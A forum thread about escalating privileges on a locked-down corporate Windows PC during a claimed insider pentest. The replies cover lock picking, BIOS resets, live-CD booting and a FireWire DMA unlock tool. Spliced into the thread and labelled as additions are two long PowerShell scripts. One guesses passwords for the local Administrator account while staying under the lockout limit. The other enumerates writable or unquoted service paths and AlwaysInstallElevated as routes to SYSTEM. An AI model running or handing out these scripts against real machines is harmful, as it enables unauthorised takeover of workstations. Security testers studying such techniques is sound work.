Thread: HELP - Escalate privilege in (well configured) Windows.

  1. #1  Just burned his ISO, Join Date May 2008, Posts 24

    Hi,

    I'm pen-testing a different kind of environment; my pen-test is internal (more like an insider).

    All I have is a PC from the company (without any tools, only Windows) connected to the local network.

    My job is to (try to) escalate privilege on this machine and get into the servers on the network.

    Up to here it all looks very easy, but there are some special points:

    - The computer has a clean Windows installation (with a small number of third-party programs: just MS Office, an antivirus, and a program used internally, a kind of ERP).

    - The Windows system is FULLY patched (WSUS).

    - My user privilege is very low; I have basically no permissions on the computer.

    - The computer also has strong Windows policies (I can't change wallpapers, see configuration properties, etc.).

    - The computer has the disk encrypted (a kind of TrueCrypt).

    - The computer has a CD-ROM and USB ports; HOWEVER, I'm unable to access them (some program (maybe an endpoint security product?) doesn't allow me to access them).

    - The boot sequence doesn't allow booting from CD or USB.

    - The BIOS is protected by passwords.

    - All physical ports on the CPU are locked with a kind of "padlock" for computers.

    - The PC does not have an internet connection.

    - I cannot use my own laptop on the network cable.

    - There is no wireless network.


    NOW..... What I thought of!

    - Reset the BIOS password via Windows (W W W.cgsecurity.org/wiki/CmosPwd); however, it needs administrative privilege.

    - By the way, booting BT from CD or USB is not possible.

    - I thought of trying a local brute force against the administrator account; since it's local, maybe it can work. Maybe there is a kind of fast (multi-threaded) tool which allows brute-forcing Windows accounts locally (maybe via the "runas" feature)? Does anyone have any hint for me?

    - I remember that some time ago a lot of people on the internet said that a "firewire" device could be used to break into any Windows. A kind of "plug and root" via FireWire, where it could copy hash files or unlock the Administrator password. Is anyone aware of a (link to a) detailed description of how to build one?

    I found:

    W W W.infopackets.com/news/hardware/2008/20080311_firewire_hack_also_works_with_windows_vista.htm

    And even:

    storm.net.nz/static/files/winlockpwn

    The big question is, how to build one? What do I need? Do I really need an iPod? Can't it be something less expensive? Maybe my own computer? Is there a step-by-step somewhere?

    Obs.: For all sites with "W W W" you must remove the spaces; I type it this way because my forum account is not allowed to post URLs yet.

    I have no more ideas.

    Do you have any idea or hint for me? All suggestions are welcome.

    Thanks
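An added example, not from the thread or any of its posters, of what the "local brute force via runas" idea in the post above looks like when done from an unprivileged PowerShell session on the target itself. The account name, candidate list and attempt budget are constructed for illustration. It validates credentials against the local SAM through System.DirectoryServices.AccountManagement (the same LogonUser path runas takes, but without spawning a process per guess) and reads the account lockout threshold with net accounts first, so the guessing stops before it locks the account out. The net accounts parsing assumes an English locale; the function names are mine.

```powershell
# Added example, not code from the thread. Guesses a short list of passwords for a
# LOCAL account from a low-privilege session. Every miss is a genuine failed logon:
# it counts toward the lockout threshold and is written to the Security log (4625),
# so the attempt budget is derived from policy and the list is kept short.
Add-Type -AssemblyName System.DirectoryServices.AccountManagement

function Get-LocalLockoutThreshold {
    # Reads "Lockout threshold:" from 'net accounts' (no admin rights needed).
    # Returns 0 for "Never", the number otherwise, or $null if the line is not
    # found (non-English locale): callers treat $null as "unknown, assume low".
    foreach ($line in (net accounts 2>$null)) {
        if ($line -match 'Lockout threshold:\s*(\S+)') {
            if ($Matches[1] -match '^\d+$') { return [int]$Matches[1] }
            return 0
        }
    }
    return $null
}

function Get-AttemptBudget {
    param([Nullable[int]]$Threshold)
    if ($null -eq $Threshold) { return 2 }      # policy unreadable: be conservative
    if ($Threshold -eq 0)     { return 50 }     # no lockout configured
    return [Math]::Max($Threshold - 2, 0)       # leave two attempts of slack
}

function Test-LocalPassword {
    param(
        [Parameter(Mandatory)][string]$User,
        [Parameter(Mandatory)][string[]]$Candidates,
        [Parameter(Mandatory)][int]$MaxAttempts
    )
    # ContextType.Machine validates against the local SAM, not a domain controller.
    $ctx = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext `
        -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Machine)
    $tried = 0
    foreach ($pw in $Candidates) {
        if ($tried -ge $MaxAttempts) {
            Write-Warning "Attempt budget ($MaxAttempts) exhausted; stopping before lockout."
            break
        }
        $tried++
        if ($ctx.ValidateCredentials($User, $pw)) { return $pw }
    }
    return $null
}

# Constructed sample inputs for the example (not credentials from the thread).
$threshold  = Get-LocalLockoutThreshold
$budget     = Get-AttemptBudget -Threshold $threshold
$candidates = @('Password1', 'Welcome1', 'Summer2008!', 'Admin123')
$hit = Test-LocalPassword -User 'Administrator' -Candidates $candidates -MaxAttempts $budget
if ($hit) { "Valid password for Administrator: $hit" } else { "No hit within a budget of $budget attempts" }
```

Even when the threshold is "Never", each miss still lands as an Event ID 4625 in the host's Security log, so in a monitored environment like the one described the attempts will be visible to whoever watches those logs. A real wordlist is only worth trying at all if the budget from Get-AttemptBudget is large; with a lockout threshold of 5, three guesses is the whole exercise.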

  2. #2  =Tron=, Senior Member, Join Date Apr 2008, Posts 2,008

    What kind of padlock are we talking about here? One approach, assuming you are allowed to do this, would be to simply pick the lock, unplug the power supply, open the computer chassis, short the BIOS battery jumper pins or simply remove the CMOS memory to reset the BIOS password, and finally reboot the computer using a BT3 live CD or USB.
    -Monkeys are like nature's humans.

  3. #3  Thorn, Senior Member, Join Date Jan 2010, Location The Green Dome, Posts 1,509

    Quote Originally Posted by =Tron=:
        What kind of padlock are we talking about here? One approach, assuming you are allowed to do this, would be to simply pick the lock, unplug the power supply, open the computer chassis, short the BIOS battery jumper pins or simply remove the CMOS memory to reset the BIOS password, and finally reboot the computer using a BT3 live CD or USB.

    Overall, this sounds like a fairly secure PC for the 'average user' in a business environment.


    I'm with Tron on this:

    1) Pick the lock and reset the BIOS.
    2) Set BIOS for USB or CD boot.
    3) Boot BT (or other Live Distro) in appropriate device.
    4) Proceed with attack(s) from there.

    Of course, some of this depends on the scope of the contract. For example, are you allowed to physically open the machine under the contract?

    Out of curiosity, why aren't you allowed to use a laptop on the network?
    Thorn
    Stop the TSA now! Boycott the airlines.

  4. #4  Developer, Join Date Mar 2007, Posts 6,126

    Quote Originally Posted by Thorn:
        Out of curiosity, why aren't you allowed to use a laptop on the network?
    This is the part I don't understand either. These seem like extreme parameters for a business-level pentest. Maybe if we knew the terms of the contract we could help find a loophole.

  5. #5  Just burned his ISO, Join Date May 2008, Posts 24

    Hi guys,

    Thank you for all the help.

    I was not aware of this "beer can"; it is really incredible!

    It worked (took some time, but it worked). Amazing!

    I saw on the same site tricks to open MasterLocks, but they also say it doesn't work on new versions. Also I saw on the internet (link broken) a tool that calculates the numbers for you. All very nice and new for me.

    Does someone know a good site with these tricks for beginners like me? Maybe with videos of building picks and lockpicking different locks?

    In particular....

    - Does someone know where a non-US guy can buy via the internet a kit like this MPSX-32?

    - Does someone know any tricks to unlock TSA-approved padlocks (using keys)?

    - A working link to this program able to calculate MasterLock combinations, and an explanation of how to use it?

    Links are very welcome.

    Lol, I'm turning the BackTrack forum into a lockpicking forum o.O

    Thanks

    cya

  6. #6  Talkie Toaster, Senior Member, Join Date Jun 2008, Location Scotland, Posts 131

    Flex your Google-fu and look for the "MIT Guide To Lockpicking"; it's written by 'Ted the Tool' and although it's 10-15 years old now it explains the theory and practice of lockpicking in an easily understandable way. It's a bit hard to find but well worth it, as it will explain so much to you.

    I can't help you with anywhere to buy lock picks, but they are easy to make once you understand what is actually going on inside the lock; my best picks are 'modified' dentist's scrapers, wire from inside pipe cleaners and an Oral-B electric toothbrush with a customised end......

    TT

    ps: it's not surprising that many forum members are interested; lockpicking and 'hacking' share many of the same skills and thought processes.

  7. #7  Member, Join Date Feb 2008, Posts 74

    Look up the following organizations: Toolnl, ssdev, Locksport International, Toool US, and NDE magazine. Some of them sell tools and have additional information.

  8. #8  Just burned his ISO, Join Date Sep 2008, Posts 9

    Quote Originally Posted by Talkie Toaster:
        Flex your Google-fu and look for the "MIT Guide To Lockpicking"; it's written by 'Ted the Tool' and although it's 10-15 years old now it explains the theory and practice of lockpicking in an easily understandable way. It's a bit hard to find but well worth it, as it will explain so much to you.
    A nice little bedtime read. Thanks for the lead, Talkie.

  9. #9  Talkie Toaster, Senior Member, Join Date Jun 2008, Location Scotland, Posts 131

    Quote Originally Posted by =Tron=:
        What kind of padlock are we talking about here? One approach, assuming you are allowed to do this, would be to simply pick the lock, unplug the power supply, open the computer chassis, short the BIOS battery jumper pins or simply remove the CMOS memory to reset the BIOS password, and finally reboot the computer using a BT3 live CD or USB.
    I love your method!

    But seriously though, in the UK computer locks and those easily pickable 'circle key' cam locks were never very popular, but I sometimes see them on US stuff on eBay. Maybe a pentester's guide on how to do this safely without breaking anything (client's machine, remember...) would be useful, as most of the ones coming up on Google seem to be for skiddies or for people with stolen laptops!

    The MIT guide to lockpicking by a guy called Ted The Tool is a good place to start. I'm sure it will be of interest to many members here. Think of it as 'hacking' a lock!

    TT

  10. #10  Just burned his ISO, Join Date May 2008, Posts 24

    Hi,

    Thank you all for the replies.

    Quote Originally Posted by =Tron=:
        What kind of padlock are we talking about here? One approach, assuming you are allowed to do this, would be to simply pick the lock, unplug the power supply, open the computer chassis, short the BIOS battery jumper pins or simply remove the CMOS memory to reset the BIOS password, and finally reboot the computer using a BT3 live CD or USB.
    I spoke with the contractors and it's allowed. However, I was unable to lockpick the device. It's a secure padlock more or less like this (I don't know the name of this lock in English):

    W W W.nomadtravel.co.uk/images/products/471719ad98c15.jpg

    Also this device has a key, so you can only open it if you are able to unlock (or lockpick) both: the number sequence + the key.

    At the client there is a division that is responsible for physical security, and they control the whole environment via video cameras; if I spend too much time playing with the lock, they come and warn me it's not allowed and that I can face legal action. Obviously, when I explain the case and they speak with the manager of the project, all will be good.

    In the end, I think I will not be opening this padlock.

    Quote Originally Posted by Thorn:
        Out of curiosity, why aren't you allowed to use a laptop on the network?
    Because this is a controlled environment, where there are only some special employees (they access really sensitive data); no one is allowed to enter the environment with laptops, cellphones, PDAs, etc.

    So the goal of the project is to identify what a real employee with bad intentions would be able to do and access....

    I looked at BT3 and it has the FireWire exploit (storm.net.nz/static/files/winlockpwn) to unlock Windows machines; maybe it can be my way to break in.

    Has someone already used it with success? What do I need to create a FireWire exploit device to exploit it?

    Is it possible to do it directly with a FireWire cable connected between 2 computers (victim and attacker)?

    Does someone have a link about how to build one, or a description?

    Any other ideas are welcome...

    Thanks

    cya
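For the project goal restated in the post above (what a low-privileged insider can reach on a fully patched, policy-locked workstation), here is an added example, not from the thread, of what a pentester would run from the existing Windows session before reaching for hardware attacks: a read-only PowerShell enumeration of the local escalation mistakes that WSUS patching does not fix. It reports services whose binary the current user can write to (third-party ERP clients and agents are a common culprit), services with unquoted paths containing spaces, the AlwaysInstallElevated policy, and whether a 1394 (FireWire) controller is present and enabled, which is what the winlockpwn idea depends on. The function names are mine; it uses only built-in cmdlets and changes nothing on the host.

```powershell
# Added example, not code from the thread. Read-only enumeration from an
# unprivileged session; nothing here needs admin rights or modifies the host.

function Get-ServiceExePath {
    # Extracts the executable from a service PathName, e.g.
    #   "C:\Program Files\ERP\agent.exe" -svc   or   C:\Program Files\ERP\agent.exe -svc
    param([string]$PathName)
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return $null
}

function Test-CurrentUserCanWrite {
    # True if an Allow ACE for the current user or one of its groups grants write/modify.
    # Untranslated generic rights (GENERIC_WRITE) are not matched; good enough for triage.
    param([string]$Path)
    $id    = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids  = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    $write = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        } catch { continue }                        # orphaned SID, cannot translate
        if (($sids -contains $sid) -and ([int]($ace.FileSystemRights -band $write) -ne 0)) { return $true }
    }
    return $false
}

function Get-WeakServices {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        $exe      = Get-ServiceExePath -PathName $svc.PathName
        $unquoted = ($svc.PathName -notmatch '^"') -and ($exe -match '\s')
        $writable = $false
        if ($exe -and (Test-Path -LiteralPath $exe)) { $writable = Test-CurrentUserCanWrite -Path $exe }
        if ($writable -or $unquoted) {
            [pscustomobject]@{
                Service   = $svc.Name
                StartName = $svc.StartName        # LocalSystem etc.: what you would become
                Binary    = $exe
                Writable  = $writable
                Unquoted  = $unquoted
            }
        }
    }
}

function Test-AlwaysInstallElevated {
    # Escalation via an MSI only works when BOTH the machine and user policy values are 1.
    $keys = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
            'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    foreach ($k in $keys) {
        $v = (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        if ($v -ne 1) { return $false }
    }
    return $true
}

function Get-FireWireControllers {
    # A present and enabled 1394 controller is the precondition for a FireWire DMA attack.
    Get-CimInstance -ClassName Win32_PnPEntity |
        Where-Object { $_.PNPClass -eq '1394' -or $_.Name -match '1394|FireWire' } |
        Select-Object Name, Status, ConfigManagerErrorCode     # 22 = disabled in Device Manager
}

$id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
"== Running as $($id.Name) =="
"== Services with writable binaries or unquoted paths =="
Get-WeakServices | Format-Table -AutoSize
"== AlwaysInstallElevated set in both HKLM and HKCU: $(Test-AlwaysInstallElevated) =="
"== FireWire (1394) controllers =="
Get-FireWireControllers | Format-Table -AutoSize
```

A row with Writable = True and StartName = LocalSystem is a complete escalation on the next reboot or service restart: replace the binary and the service runs your code as SYSTEM. An unquoted path only matters if one of the intermediate directories (for a path under C:\Program Files\ERP Client\, that is C:\ or C:\Program Files\) is writable, which this script leaves for a follow-up Get-Acl. An empty FireWire list, or a controller with ConfigManagerErrorCode 22, means the winlockpwn route discussed in the thread is closed on this host regardless of the cable.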
